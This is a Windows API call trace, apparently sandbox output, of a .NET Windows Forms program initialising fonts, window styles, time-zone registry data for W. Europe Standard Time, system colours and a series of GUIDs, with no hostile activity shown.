[0139.130] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0139.131] AdjustWindowRectEx (in: lpRect=0x19ebe8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ebe8) returned 1
[0139.139] GetSystemDefaultLCID () returned 0x409
[0139.140] GetStockObject (i=17) returned 0x10a0047
[0139.142] GetObjectW (in: h=0x10a0047, c=92, pv=0x19e934 | out: pv=0x19e934) returned 92
[0139.143] GetDC (hWnd=0x0) returned 0xa0100d0
[0140.646] GdiplusStartup (in: token=0x5d5f50, input=0x19def0, output=0x19df40 | out: token=0x5d5f50, output=0x19df40) returned 0x0
[0140.655] CoTaskMemAlloc (cb=0x5c) returned 0x85c020
[0140.657] GdipCreateFontFromLogfontW (hdc=0xa0100d0, logfont=0x85c020, font=0x19e9fc) returned 0x0
[0142.282] CoTaskMemFree (pv=0x85c020)
[0142.283] CoTaskMemAlloc (cb=0x5c) returned 0x85bad8
[0142.283] CoTaskMemFree (pv=0x85bad8)
[0142.284] CoTaskMemAlloc (cb=0x5c) returned 0x85bba8
[0142.284] CoTaskMemFree (pv=0x85bba8)
[0142.284] GdipGetFontUnit (font=0x4921f08, unit=0x19e9c8) returned 0x0
[0142.284] GdipGetFontSize (font=0x4921f08, size=0x19e9cc) returned 0x0
[0142.284] GdipGetFontStyle (font=0x4921f08, style=0x19e9c4) returned 0x0
[0142.285] GdipGetFamily (font=0x4921f08, family=0x19e9c0) returned 0x0
[0142.285] GdipGetFontSize (font=0x4921f08, size=0x22440a8) returned 0x0
[0142.286] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0142.286] GetDC (hWnd=0x0) returned 0xc0100ae
[0142.286] GdipCreateFromHDC (hdc=0xc0100ae, graphics=0x19e9e4) returned 0x0
[0142.293] GdipGetDpiY (graphics=0x5cdf268, dpi=0x22441b0) returned 0x0
[0142.293] GdipGetFontHeight (font=0x4921f08, graphics=0x5cdf268, height=0x19e9dc) returned 0x0
[0142.293] GdipGetEmHeight (family=0x5cd58b0, style=0, EmHeight=0x19e9e4) returned 0x0
[0142.293] GdipGetLineSpacing (family=0x5cd58b0, style=0, LineSpacing=0x19e9e4) returned 0x0
[0142.294] GdipDeleteGraphics (graphics=0x5cdf268) returned 0x0
[0142.295] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1
[0142.295] GdipCreateFont (fontFamily=0x5cd58b0, emSize=0x41040000, style=0, unit=0x3, font=0x2244170) returned 0x0
[0142.295] GdipGetFontSize (font=0x492efc0, size=0x2244174) returned 0x0
[0142.295] GdipDeleteFont (font=0x4921f08) returned 0x0
[0142.296] GetDC (hWnd=0x0) returned 0xc0100ae
[0142.296] GdipCreateFromHDC (hdc=0xc0100ae, graphics=0x19ea30) returned 0x0
[0142.296] GdipGetFontHeight (font=0x492efc0, graphics=0x5cdf268, height=0x19ea28) returned 0x0
[0142.296] GdipDeleteGraphics (graphics=0x5cdf268) returned 0x0
[0142.296] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1
[0142.303] GdipGetFamilyName (in: family=0x5cd58b0, name=0x19e93c, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0
[0142.304] CreateCompatibleDC (hdc=0x0) returned 0x2b010970
[0142.305] GetCurrentObject (hdc=0x2b010970, type=0x1) returned 0x1b00017
[0142.305] GetCurrentObject (hdc=0x2b010970, type=0x2) returned 0x1900010
[0142.306] GetCurrentObject (hdc=0x2b010970, type=0x7) returned 0x185000f
[0142.306] GetCurrentObject (hdc=0x2b010970, type=0x6) returned 0x18a0048
[0142.306] SaveDC (hdc=0x2b010970) returned 1
[0142.307] GetDeviceCaps (hdc=0x2b010970, index=90) returned 96
[0142.307] CoTaskMemAlloc (cb=0x5c) returned 0x85ba08
[0142.307] CreateFontIndirectW (lplf=0x85ba08) returned 0x270a0685
[0142.308] CoTaskMemFree (pv=0x85ba08)
[0142.308] GetObjectW (in: h=0x270a0685, c=92, pv=0x19e900 | out: pv=0x19e900) returned 92
[0142.308] GetCurrentObject (hdc=0x2b010970, type=0x6) returned 0x18a0048
[0142.308] GetObjectW (in: h=0x18a0048, c=92, pv=0x19e860 | out: pv=0x19e860) returned 92
[0142.309] SelectObject (hdc=0x2b010970, h=0x270a0685) returned 0x18a0048
[0142.309] GetMapMode (hdc=0x2b010970) returned 1
[0142.309] GetTextMetricsW (in: hdc=0x2b010970, lptm=0x19e928 | out: lptm=0x19e928) returned 1
[0142.310] DrawTextExW (in: hdc=0x2b010970, lpchText="j^", cchText=2, lprc=0x19ea34, format=0x420, lpdtp=0x2244788 | out: lpchText="j^", lprc=0x19ea34) returned 13
[0142.359] GetSystemMetrics (nIndex=5) returned 1
[0142.359] GetSystemMetrics (nIndex=6) returned 1
[0142.359] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0142.360] DrawTextExW (in: hdc=0x2b010970, lpchText="j^", cchText=2, lprc=0x19ea2c, format=0x420, lpdtp=0x22448a4 | out: lpchText="j^", lprc=0x19ea2c) returned 13
[0142.360] GetSystemMetrics (nIndex=5) returned 1
[0142.360] GetSystemMetrics (nIndex=6) returned 1
[0142.360] AdjustWindowRectEx (in: lpRect=0x19ebf0, dwStyle=0x56210242, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19ebf0) returned 1
[0142.470] GetDC (hWnd=0x0) returned 0xc0100ae
[0142.470] GdipCreateFromHDC (hdc=0xc0100ae, graphics=0x19eac0) returned 0x0
[0142.471] GdipGetFontHeight (font=0x492efc0, graphics=0x5cdf268, height=0x19eab8) returned 0x0
[0142.471] GdipDeleteGraphics (graphics=0x5cdf268) returned 0x0
[0142.471] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1
[0142.471] GetSystemMetrics (nIndex=5) returned 1
[0142.471] GetSystemMetrics (nIndex=6) returned 1
[0142.472] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0142.473] AdjustWindowRectEx (in: lpRect=0x19ebe8, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19ebe8) returned 1
[0142.479] GetDC (hWnd=0x0) returned 0xc0100ae
[0142.479] GdipCreateFromHDC (hdc=0xc0100ae, graphics=0x19eac0) returned 0x0
[0142.479] GdipGetFontHeight (font=0x492efc0, graphics=0x5cdf268, height=0x19eab8) returned 0x0
[0142.479] GdipDeleteGraphics (graphics=0x5cdf268) returned 0x0
[0142.480] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1
[0142.480] GetSystemMetrics (nIndex=5) returned 1
[0142.480] GetSystemMetrics (nIndex=6) returned 1
[0142.480] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0142.480] AdjustWindowRectEx (in: lpRect=0x19ebe8, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19ebe8) returned 1
[0142.487] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0142.487] AdjustWindowRectEx (in: lpRect=0x19ebec, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ebec) returned 1
[0142.493] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19ea00 | out: lpTimeZoneInformation=0x19ea00) returned 0x2
[0142.497] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x19e85c | out: pTimeZoneInformation=0x19e85c) returned 0x2
[0142.500] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e940 | out: phkResult=0x19e940*=0x2c4) returned 0x0
[0142.501] RegQueryValueExW (in: hKey=0x2c4, lpValueName="TZI", lpReserved=0x0, lpType=0x19e95c, lpData=0x0, lpcbData=0x19e958*=0x0 | out: lpType=0x19e95c*=0x3, lpData=0x0, lpcbData=0x19e958*=0x2c) returned 0x0
[0142.501] RegQueryValueExW (in: hKey=0x2c4, lpValueName="TZI", lpReserved=0x0, lpType=0x19e95c, lpData=0x2249b68, lpcbData=0x19e958*=0x2c | out: lpType=0x19e95c*=0x3, lpData=0x2249b68*, lpcbData=0x19e958*=0x2c) returned 0x0
[0142.502] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e794 | out: phkResult=0x19e794*=0x0) returned 0x2
[0142.503] RegQueryValueExW (in: hKey=0x2c4, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x19e934, lpData=0x0, lpcbData=0x19e930*=0x0 | out: lpType=0x19e934*=0x1, lpData=0x0, lpcbData=0x19e930*=0x20) returned 0x0
[0142.503] RegQueryValueExW (in: hKey=0x2c4, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x19e934, lpData=0x224a074, lpcbData=0x19e930*=0x20 | out: lpType=0x19e934*=0x1, lpData="@tzres.dll,-320", lpcbData=0x19e930*=0x20) returned 0x0
[0142.503] RegQueryValueExW (in: hKey=0x2c4, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x19e934, lpData=0x0, lpcbData=0x19e930*=0x0 | out: lpType=0x19e934*=0x1, lpData=0x0, lpcbData=0x19e930*=0x20) returned 0x0
[0142.503] RegQueryValueExW (in: hKey=0x2c4, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x19e934, lpData=0x224a0cc, lpcbData=0x19e930*=0x20 | out: lpType=0x19e934*=0x1, lpData="@tzres.dll,-322", lpcbData=0x19e930*=0x20) returned 0x0
[0142.504] RegQueryValueExW (in: hKey=0x2c4, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x19e934, lpData=0x0, lpcbData=0x19e930*=0x0 | out: lpType=0x19e934*=0x1, lpData=0x0, lpcbData=0x19e930*=0x20) returned 0x0
[0142.504] RegQueryValueExW (in: hKey=0x2c4, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x19e934, lpData=0x224a124, lpcbData=0x19e930*=0x20 | out: lpType=0x19e934*=0x1, lpData="@tzres.dll,-321", lpcbData=0x19e930*=0x20) returned 0x0
[0150.150] CoTaskMemAlloc (cb=0x20c) returned 0x87aed8
[0150.150] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x87aed8 | out: pszPath="C:\\Windows\\system32") returned 0x0
[0150.157] CoTaskMemFree (pv=0x87aed8)
[0150.175] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x19d360 | out: phkResult=0x19d360*=0x0) returned 0x2
[0150.184] CoTaskMemAlloc (cb=0x20c) returned 0x87aed8
[0150.184] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19e950, pwszFileMUIPath=0x87aed8, pcchFileMUIPath=0x19e954, pululEnumerator=0x19e948 | out: pwszLanguage=0x0, pcchLanguage=0x19e950, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19e954, pululEnumerator=0x19e948) returned 1
[0150.383] CoTaskMemFree (pv=0x0)
[0150.383] CoTaskMemFree (pv=0x87aed8)
[0150.384] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x4810001
[0150.400] CoTaskMemAlloc (cb=0x3ec) returned 0x87aed8
[0150.400] LoadStringW (in: hInstance=0x4810001, uID=0x140, lpBuffer=0x87aed8, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c
[0150.400] CoTaskMemFree (pv=0x87aed8)
[0150.401] FreeLibrary (hLibModule=0x4810001) returned 1
[0150.402] CoTaskMemAlloc (cb=0x20c) returned 0x87aed8
[0150.402] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x87aed8 | out: pszPath="C:\\Windows\\system32") returned 0x0
[0150.402] CoTaskMemFree (pv=0x87aed8)
[0150.402] CoTaskMemAlloc (cb=0x20c) returned 0x87aed8
[0150.402] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19e950, pwszFileMUIPath=0x87aed8, pcchFileMUIPath=0x19e954, pululEnumerator=0x19e948 | out: pwszLanguage=0x0, pcchLanguage=0x19e950, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19e954, pululEnumerator=0x19e948) returned 1
[0150.404] CoTaskMemFree (pv=0x0)
[0150.404] CoTaskMemFree (pv=0x87aed8)
[0150.404] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x4810001
[0150.406] CoTaskMemAlloc (cb=0x3ec) returned 0x87aed8
[0150.406] LoadStringW (in: hInstance=0x4810001, uID=0x142, lpBuffer=0x87aed8, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17
[0150.407] CoTaskMemFree (pv=0x87aed8)
[0150.407] FreeLibrary (hLibModule=0x4810001) returned 1
[0150.407] CoTaskMemAlloc (cb=0x20c) returned 0x87aed8
[0150.407] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x87aed8 | out: pszPath="C:\\Windows\\system32") returned 0x0
[0150.407] CoTaskMemFree (pv=0x87aed8)
[0150.407] CoTaskMemAlloc (cb=0x20c) returned 0x87aed8
[0150.407] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19e950, pwszFileMUIPath=0x87aed8, pcchFileMUIPath=0x19e954, pululEnumerator=0x19e948 | out: pwszLanguage=0x0, pcchLanguage=0x19e950, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19e954, pululEnumerator=0x19e948) returned 1
[0150.410] CoTaskMemFree (pv=0x0)
[0150.410] CoTaskMemFree (pv=0x87aed8)
[0150.410] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x4810001
[0150.414] CoTaskMemAlloc (cb=0x3ec) returned 0x87aed8
[0150.414] LoadStringW (in: hInstance=0x4810001, uID=0x141, lpBuffer=0x87aed8, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17
[0150.414] CoTaskMemFree (pv=0x87aed8)
[0150.414] FreeLibrary (hLibModule=0x4810001) returned 1
[0150.415] RegCloseKey (hKey=0x2c4) returned 0x0
[0150.507] GetDC (hWnd=0x0) returned 0xc0100ae
[0150.508] GdipCreateFromHDC (hdc=0xc0100ae, graphics=0x19eab8) returned 0x0
[0150.509] GdipGetFontHeight (font=0x492efc0, graphics=0x5cdf268, height=0x19eab0) returned 0x0
[0150.509] GdipDeleteGraphics (graphics=0x5cdf268) returned 0x0
[0150.509] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1
[0150.509] GetSystemMetrics (nIndex=5) returned 1
[0150.509] GetSystemMetrics (nIndex=6) returned 1
[0150.609] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.610] AdjustWindowRectEx (in: lpRect=0x19ebe0, dwStyle=0x56010000, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19ebe0) returned 1
[0150.615] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.615] AdjustWindowRectEx (in: lpRect=0x19ebec, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ebec) returned 1
[0150.646] GdipCreateFontFamilyFromName (name="Microsoft Sans Serif", fontCollection=0x0, fontFamily=0x19ebc8) returned 0x0
[0150.646] GdipCreateFont (fontFamily=0x5cd58b0, emSize=0x41640000, style=1, unit=0x3, font=0x224f0a4) returned 0x0
[0150.646] GdipGetFontSize (font=0x4921f08, size=0x224f0a8) returned 0x0
[0150.650] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.650] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0150.660] GetProcessWindowStation () returned 0xf0
[0150.672] GetUserObjectInformationA (in: hObj=0xf0, nIndex=1, pvInfo=0x224f7f8, nLength=0xc, lpnLengthNeeded=0x19ea28 | out: pvInfo=0x224f7f8, lpnLengthNeeded=0x19ea28) returned 1
[0150.678] SetConsoleCtrlHandler (HandlerRoutine=0x4bc065e, Add=1) returned 1
[0150.679] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0150.679] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0150.681] GetClassInfoW (in: hInstance=0x400000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.1ca0192.0", lpWndClass=0x224f85c | out: lpWndClass=0x224f85c) returned 0
[0150.683] CoTaskMemAlloc (cb=0x58) returned 0x854770
[0150.683] RegisterClassW (lpWndClass=0x19e978) returned 0xc1d9
[0150.684] CoTaskMemFree (pv=0x854770)
[0150.687] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.1ca0192.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.1ca0192.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x203da
[0150.689] NtdllDefWindowProc_W (hWnd=0x203da, Msg=0x81, wParam=0x0, lParam=0x19e4b8) returned 0x1
[0150.692] NtdllDefWindowProc_W (hWnd=0x203da, Msg=0x83, wParam=0x0, lParam=0x19e4a4) returned 0x0
[0150.693] NtdllDefWindowProc_W (hWnd=0x203da, Msg=0x1, wParam=0x0, lParam=0x19e4b8) returned 0x0
[0150.693] NtdllDefWindowProc_W (hWnd=0x203da, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0
[0150.693] NtdllDefWindowProc_W (hWnd=0x203da, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0
[0150.696] GetSysColor (nIndex=10) returned 0xb4b4b4
[0150.696] GetSysColor (nIndex=2) returned 0xd1b499
[0150.696] GetSysColor (nIndex=9) returned 0x0
[0150.697] GetSysColor (nIndex=12) returned 0xababab
[0150.697] GetSysColor (nIndex=15) returned 0xf0f0f0
[0150.697] GetSysColor (nIndex=20) returned 0xffffff
[0150.697] GetSysColor (nIndex=16) returned 0xa0a0a0
[0150.697] GetSysColor (nIndex=15) returned 0xf0f0f0
[0150.697] GetSysColor (nIndex=16) returned 0xa0a0a0
[0150.697] GetSysColor (nIndex=21) returned 0x696969
[0150.697] GetSysColor (nIndex=22) returned 0xe3e3e3
[0150.697] GetSysColor (nIndex=20) returned 0xffffff
[0150.697] GetSysColor (nIndex=18) returned 0x0
[0150.697] GetSysColor (nIndex=1) returned 0x0
[0150.697] GetSysColor (nIndex=27) returned 0xead1b9
[0150.697] GetSysColor (nIndex=28) returned 0xf2e4d7
[0150.697] GetSysColor (nIndex=17) returned 0x6d6d6d
[0150.697] GetSysColor (nIndex=13) returned 0xff9933
[0150.697] GetSysColor (nIndex=14) returned 0xffffff
[0150.698] GetSysColor (nIndex=26) returned 0xcc6600
[0150.698] GetSysColor (nIndex=11) returned 0xfcf7f4
[0150.698] GetSysColor (nIndex=3) returned 0xdbcdbf
[0150.698] GetSysColor (nIndex=19) returned 0x0
[0150.698] GetSysColor (nIndex=24) returned 0xe1ffff
[0150.698] GetSysColor (nIndex=23) returned 0x0
[0150.698] GetSysColor (nIndex=4) returned 0xf0f0f0
[0150.698] GetSysColor (nIndex=30) returned 0xf0f0f0
[0150.698] GetSysColor (nIndex=29) returned 0xff9933
[0150.698] GetSysColor (nIndex=7) returned 0x0
[0150.698] GetSysColor (nIndex=0) returned 0xc8c8c8
[0150.698] GetSysColor (nIndex=5) returned 0xffffff
[0150.698] GetSysColor (nIndex=6) returned 0x646464
[0150.698] GetSysColor (nIndex=8) returned 0x0
[0150.700] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.700] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0150.703] GdipCreateFontFamilyFromName (name="Microsoft Sans Serif", fontCollection=0x0, fontFamily=0x19ebc8) returned 0x0
[0150.703] GdipCreateFont (fontFamily=0x5cd58b0, emSize=0x41340000, style=1, unit=0x3, font=0x224fbfc) returned 0x0
[0150.703] GdipGetFontSize (font=0x5cdaf30, size=0x224fc00) returned 0x0
[0150.704] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.704] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0150.704] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.704] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0150.709] GdipCreateFontFamilyFromName (name="Microsoft Sans Serif", fontCollection=0x0, fontFamily=0x19ebc8) returned 0x0
[0150.709] GdipCreateFont (fontFamily=0x5cd58b0, emSize=0x41340000, style=1, unit=0x3, font=0x224fda8) returned 0x0
[0150.709] GdipGetFontSize (font=0x5cdaf58, size=0x224fdac) returned 0x0
[0150.710] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.710] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0150.710] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.710] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0150.712] GdipCreateFontFamilyFromName (name="Microsoft Sans Serif", fontCollection=0x0, fontFamily=0x19ebc8) returned 0x0
[0150.715] GdipCreateFont (fontFamily=0x5cd58b0, emSize=0x41340000, style=1, unit=0x3, font=0x224ff54) returned 0x0
[0150.715] GdipGetFontSize (font=0x5cdaf80, size=0x224ff58) returned 0x0
[0150.715] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.715] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0150.716] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.716] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0150.719] GdipCreateFontFamilyFromName (name="Microsoft Sans Serif", fontCollection=0x0, fontFamily=0x19ebc8) returned 0x0
[0150.719] GdipCreateFont (fontFamily=0x5cd58b0, emSize=0x41340000, style=1, unit=0x3, font=0x2250100) returned 0x0
[0150.722] GdipGetFontSize (font=0x5cdafa8, size=0x2250104) returned 0x0
[0150.723] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.723] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0150.723] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.723] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0150.725] GdipCreateFontFamilyFromName (name="Microsoft Sans Serif", fontCollection=0x0, fontFamily=0x19ebc8) returned 0x0
[0150.726] GdipCreateFont (fontFamily=0x5cd58b0, emSize=0x41340000, style=1, unit=0x3, font=0x22502ac) returned 0x0
[0150.726] GdipGetFontSize (font=0x5cdafd0, size=0x22502b0) returned 0x0
[0150.726] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.726] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0150.726] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.726] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0150.731] GdipCreateFontFamilyFromName (name="Microsoft Sans Serif", fontCollection=0x0, fontFamily=0x19ebc8) returned 0x0
[0150.731] GdipCreateFont (fontFamily=0x5cd58b0, emSize=0x41340000, style=1, unit=0x3, font=0x2250458) returned 0x0
[0150.731] GdipGetFontSize (font=0x5cdaff8, size=0x225045c) returned 0x0
[0150.732] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.732] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0150.732] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.732] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0150.734] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.734] AdjustWindowRectEx (in: lpRect=0x19eb78, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb78) returned 1
[0150.739] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.739] AdjustWindowRectEx (in: lpRect=0x19eb78, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb78) returned 1
[0150.741] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0150.741] AdjustWindowRectEx (in: lpRect=0x19eb78, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb78) returned 1
[0150.762] CoCreateGuid (in: pguid=0x19e394 | out: pguid=0x19e394*(Data1=0x7c3633e8, Data2=0x1134, Data3=0x4ef7, Data4=([0]=0xb7, [1]=0xbe, [2]=0x28, [3]=0xe3, [4]=0xe, [5]=0x6e, [6]=0xed, [7]=0xc))) returned 0x0
[0150.762] CoCreateGuid (in: pguid=0x19e394 | out: pguid=0x19e394*(Data1=0x51d9186e, Data2=0x1a5d, Data3=0x4246, Data4=([0]=0x9b, [1]=0x2f, [2]=0x75, [3]=0xbe, [4]=0xfb, [5]=0x3c, [6]=0x9, [7]=0x95))) returned 0x0
[0150.763] CoCreateGuid (in: pguid=0x19e394 | out: pguid=0x19e394*(Data1=0x8ad639d6, Data2=0x435e, Data3=0x4404, Data4=([0]=0x9b, [1]=0x47, [2]=0x7b, [3]=0xec, [4]=0xd2, [5]=0x39, [6]=0x7b, [7]=0x26))) returned 0x0
[0150.763] CoCreateGuid (in: pguid=0x19e394 | out: pguid=0x19e394*(Data1=0x4de7a4e6, Data2=0x9d42, Data3=0x4454, Data4=([0]=0x8e, [1]=0x9c, [2]=0xd2, [3]=0xea, [4]=0x2b, [5]=0xbf, [6]=0xf0, [7]=0xf))) returned 0x0
[0150.763] CoCreateGuid (in: pguid=0x19e394 | out: pguid=0x19e394*(Data1=0x8566eb82, Data2=0xc087, Data3=0x4ae2, Data4=([0]=0x97, [1]=0x6d, [2]=0x12, [3]=0x86, [4]=0x17, [5]=0xc5, [6]=0x86, [7]=0x6c))) returned 0x0
[0150.763] CoCreateGuid (in: pguid=0x19e394 | out: pguid=0x19e394*(Data1=0xef35dcba, Data2=0xbf78, Data3=0x4db4, Data4=([0]=0x89, [1]=0xe6, [2]=0xd4, [3]=0x53, [4]=0xd7, [5]=0x8, [6]=0x55, [7]=0x90))) returned 0x0
[0150.763] CoCreateGuid (in: pguid=0x19e394 | out: pguid=0x19e394*(Data1=0xae05dd42, Data2=0xce7c, Data3=0x454e, Data4=([0]=0xb8, [1]=0x29, [2]=0xa, [3]=0xc1, [4]=0xc5, [5]=0x86, [6]=0xf2, [7]=0x26))) returned 0x0
[0150.763] CoCreateGuid (in: pguid=0x19e394 | out: pguid=0x19e394*(Data1=0xbb2226aa, Data2=0x3ed6, Data3=0x45c0, Data4=([0]=0xb6, [1]=0x22, [2]=0xbf, [3]=0x5d, [4]=0xda, [5]=0x78, [6]=0x3f, [7]=0x5e))) returned 0x0
[0150.763] CoCreateGuid (in: pguid=0x19e394 | out: pguid=0x19e394*(Data1=0xd5df8903, Data2=0x46ab, Data3=0x4568, Data4=([0]=0x94, [1]=0xa7, [2]=0x39, [3]=0x63, [4]=0x78, [5]=0x9, [6]=0x4e, [7]=0x9e))) returned 0x0
[0150.763] CoCreateGuid (in: pguid=0x19e394 | out: pguid=0x19e394*(Data1=0x2c8afea2, Data2=0x4044, Data3=0x45b4, Data4=([0]=0x9a, [1]=0x21, [2]=0x71, [3]=0x77, [4]=0xeb, [5]=0xec, [6]=0x32, [7]=0xa))) returned 0x0
